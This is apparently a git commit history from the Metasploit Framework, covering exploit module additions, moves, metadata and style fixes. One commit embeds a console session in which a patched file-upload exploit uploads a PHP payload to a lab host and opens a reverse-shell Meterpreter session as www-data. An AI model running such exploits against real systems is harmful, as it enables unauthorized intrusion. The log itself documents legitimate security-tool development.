90b9204703
Update DisclosureDate to ISO 8601 in my modules
...
Basic msftidy fixer:
diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
# Check disclosure date format
if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
d = $1 #Captured date
+ File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+ fixed('Probably updated traditional DisclosureDate to ISO 8601')
# Flag if overall format is wrong
if d =~ /^... (?:\d{1,2},? )?\d{4}$/
# Flag if month format is wrong
2018-11-16 12:18:28 -06:00
aff4ef0752
land #10912 moving polycom exploit to misc folder
2018-11-05 16:54:24 -05:00
a32d8083f0
Land #10847 - Add blueimp's jQuery (Arbitrary) File Upload
...
CVE-2018-9206
2018-11-05 11:37:20 -06:00
fdf45f269b
Move polycom_hdx_auth_bypass to exploit/unix/misc/
2018-11-04 06:14:26 +00:00
6bc4b71ca3
Land #10873 , Add notes to exploit modules
2018-11-02 14:11:11 -05:00
caf76a6555
Add applicable notes to my exploit modules
2018-10-27 20:54:14 -04:00
458f635159
Add supported payloads to module description
2018-10-24 01:30:27 -05:00
839c4e0467
Drop rank to AverageRanking for now
2018-10-24 01:30:17 -05:00
37560760df
Add RequiredCmd for generic and telnet
2018-10-24 01:23:15 -05:00
67f2933b58
Make fewer assumptions about Apache
...
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
2018-10-23 16:26:17 -05:00
bdf2d44415
Augment check with Apache Server header
2018-10-23 07:04:14 -05:00
0249f1a4af
Improve check method and refactor
2018-10-23 06:20:31 -05:00
3d06c10ad0
Link to Apache AllowOverride directive and change
2018-10-23 03:51:16 -05:00
c9673df3b8
Add WordPress Work The Flow File Upload links
...
As noted by @bcoles, we have a module exploiting this vuln in #5130 ,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.
msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff
diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
post_data = data.to_s
res = send_request_cgi({
- 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
- 'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+ 'uri' => '/jQuery-File-Upload/server/php/index.php',
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Calling payload...")
send_request_cgi(
- 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
- 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+ 'uri' => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
)
end
end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...
[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu-xenial
OS : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Welp.
2018-10-23 03:51:11 -05:00
a55f7ff30a
Clarify vuln (re)discovery vs. disclosure
...
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
b4bdc52597
Sort path list by frequency
2018-10-22 23:35:42 -05:00
dbc0c802d5
Add detection of additional paths
2018-10-22 23:35:42 -05:00
c4f8b6c937
Add rudimentary check method
2018-10-22 23:35:42 -05:00
dba7e35819
Refactor slightly with methods
...
And also check upload response.
2018-10-22 23:35:42 -05:00
e7ada1a40c
Add timeout on payload request
...
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
15f14bb295
Add note about Apache .htaccess
2018-10-22 23:35:42 -05:00
a986a17bb0
Link to @lcashdol's PoC
2018-10-22 23:35:42 -05:00
37dbdbf58f
Update project URL to PR
2018-10-22 23:35:42 -05:00
41721c31fb
Add blueimp's jQuery (Arbitrary) File Upload
2018-10-22 23:35:42 -05:00
58a6c4137d
Add a better timeout than expect can provide
2018-10-20 13:56:37 -05:00
a965abaf36
Add full payload support by setting $PATH
2018-10-20 13:56:33 -05:00
60c4b87ad1
Prefer expect over sleeping between writes
2018-10-20 13:15:15 -05:00
ad6f15c8ca
Add Morris worm sendmail debug mode exploit
2018-10-20 13:15:01 -05:00
7a36056713
Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec
2018-10-20 18:16:59 +00:00
a14df8d86e
Move exploit/unix/misc/qnx_qconn_exec to exploit/qnx/qconn_exec
2018-10-16 16:21:28 +00:00
7bc98e0ea8
Fix formatting and convert a missed AKA reference
2018-10-05 03:22:08 -05:00
6f5a8f8f42
Fix outdated metadata
2018-10-01 18:59:09 +01:00
6126a627cc
Land #10570 , AKA Metadata Refactor
2018-09-17 22:29:20 -05:00
011c25ed59
Merge changes from master (ghostscript)
2018-09-17 13:57:28 -05:00
4c036e70c1
Fix http://seclists.org links to https://
...
I have no idea how this happened in my own code. I was seeing https://.
2018-09-15 18:54:45 -05:00
692ddc8b8b
Eschew updating imagemagick_delegate
...
The hype is over, and the target was provided as a bonus. Now update the
module language to reflect that.
2018-09-05 19:56:32 -05:00
13ff71b879
Clean up previous modules
...
Missed in 35670713ff
2018-09-05 19:56:32 -05:00
e243ce9eee
Update AKA for ghostscript_type_confusion
2018-08-31 16:56:35 -05:00
eb17d9b198
Refactor AKA references for modules
2018-08-31 16:56:05 -05:00
6df235062b
Land #10505 , post-auth and default creds info
2018-08-24 18:08:15 -05:00
b899839c53
Oops I made boo-boos
2018-08-21 08:53:43 -05:00
01ad152067
Update false negatives on post auth information
2018-08-20 16:05:58 -05:00
3d0d8f7773
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
60c0272270
Make style consistent
2018-08-15 21:27:40 -05:00
cd01f11fd2
Remove verifying host keys for all exploits
2018-08-15 14:54:41 -07:00
129fd44350
Land #10305 , SonicWall XML-RPC RCE
2018-07-30 14:14:26 -05:00
38f6b8aada
Clean up module
2018-07-30 14:06:33 -05:00
2dff66aacb
Check nil
2018-07-26 11:23:16 -05:00
f5ccdcfcd2
Net SSH CommandStream fixes implemented
...
* Net::SSH::CommandStream typos fixed
* Net::SSH::CommandStream cleanup made more robust and refactored
* require 'net/ssh/command_stream' added to various modules
2018-07-25 11:22:28 -05:00
1a3a4ef5e4
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
William Vu
h00die
Wei Chen
Brendan Coles
Jacob Robles
Spencer McIntyre
Rob
Brent Cook
Erin Bleiweiss
Kevin Kirsche
Sonny Gonzalez
asoto-r7